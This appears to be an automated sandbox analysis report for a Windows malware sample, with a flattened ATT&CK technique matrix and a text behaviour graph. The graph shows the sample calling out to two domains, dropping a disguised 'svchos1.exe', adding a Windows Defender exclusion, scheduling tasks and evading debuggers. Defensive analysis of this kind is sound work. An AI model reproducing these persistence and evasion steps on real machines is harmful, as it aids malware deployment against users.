          NTDS1
          System Service Discovery
          Distributed Component Object Model3
          Clipboard Data
          2
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
          Process Injection
          1
          Masquerading
          LSA Secrets2
          File and Directory Discovery
          SSHKeylogging3
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
          Scheduled Task/Job
          121
          Virtualization/Sandbox Evasion
          Cached Domain Credentials37
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation
          DCSync351
          Security Software Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
          Process Injection
          Proc Filesystem121
          Virtualization/Sandbox Evasion
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Indicator Removal
          /etc/passwd and /etc/shadow2
          Process Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing11
          Application Window Discovery
          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
          System Owner/User Discovery
          Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640060 Sample: SystemProcess18.exe Startdate: 16/03/2025 Architecture: WINDOWS Score: 100 71 xiaobaituzi.com 2->71 73 qiniustaticopencdn.jomodns.com 2->73 75 2 other IPs or domains 2->75 87 Malicious sample detected (through community Yara rule) 2->87 89 Antivirus detection for URL or domain 2->89 91 Multi AV Scanner detection for submitted file 2->91 93 8 other signatures 2->93 9 SystemProcess18.exe 2 2->9         started        13 svchos1.exe 2->13         started        signatures3 process4 dnsIp5 77 qiniustaticopencdn.jomodns.com 113.142.77.41, 443, 49693, 49698 CHINANET-SHAANXI-CLOUD-BASECHINANETSHAANXIprovinceCloud China 9->77 95 Uses schtasks.exe or at.exe to add and modify task schedules 9->95 97 Adds a directory exclusion to Windows Defender 9->97 15 SystemProcess18.exe 2 21 9->15         started        20 powershell.exe 9->20         started        22 powershell.exe 9->22         started        30 16 other processes 9->30 99 Multi AV Scanner detection for dropped file 13->99 101 Found evasive API chain (may stop execution after checking mutex) 13->101 103 Found API chain indicative of debugger detection 13->103 105 Contains functionality to detect sleep reduction / modifications 13->105 24 svchos1.exe 13->24         started        26 powershell.exe 13->26         started        28 powershell.exe 13->28         started        signatures6 process7 dnsIp8 79 xiaobaituzi.com 38.46.13.66, 443, 49700, 49701 COGENT-174US United States 15->79 67 C:\Users\Public\Documents\MM\svchos1.exe, PE32 15->67 dropped 69 C:\Users\...\svchos1.exe:Zone.Identifier, ASCII 15->69 dropped 83 Adds a directory exclusion to Windows Defender 15->83 32 powershell.exe 15->32         started        35 powershell.exe 15->35         started        43 15 other processes 15->43 85 Loading BitLocker PowerShell Module 20->85 45 2 other processes 20->45 37 conhost.exe 22->37         started        47 2 other processes 24->47 39 conhost.exe 26->39         started        41 conhost.exe 28->41         started        49 16 other processes 30->49 file9 signatures10 process11 signatures12 81 Loading BitLocker PowerShell Module 32->81 51 conhost.exe 32->51         started        53 conhost.exe 35->53         started        55 conhost.exe 43->55         started        57 conhost.exe 43->57         started        59 conhost.exe 43->59         started        65 11 other processes 43->65 61 conhost.exe 47->61         started        63 conhost.exe 47->63         started        process13

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.